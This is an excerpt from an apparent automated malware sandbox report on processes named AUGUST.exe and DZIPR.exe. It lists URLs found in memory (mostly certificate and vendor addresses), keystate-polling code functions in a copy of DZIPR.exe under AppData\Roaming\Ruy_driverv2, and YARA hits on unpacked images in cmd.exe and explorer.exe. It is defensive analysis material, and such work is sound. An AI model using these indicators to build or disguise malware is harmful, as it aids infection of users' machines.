Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003511000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.000000000559F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D26000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.0000000005580000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000013.00000003.2841725862.000001E28ADAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA704EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	15_2_6FA704EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C5404EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	16_2_6C5404EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD104EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	20_2_6FD104EE

Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3213673292.0000000002F1F000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
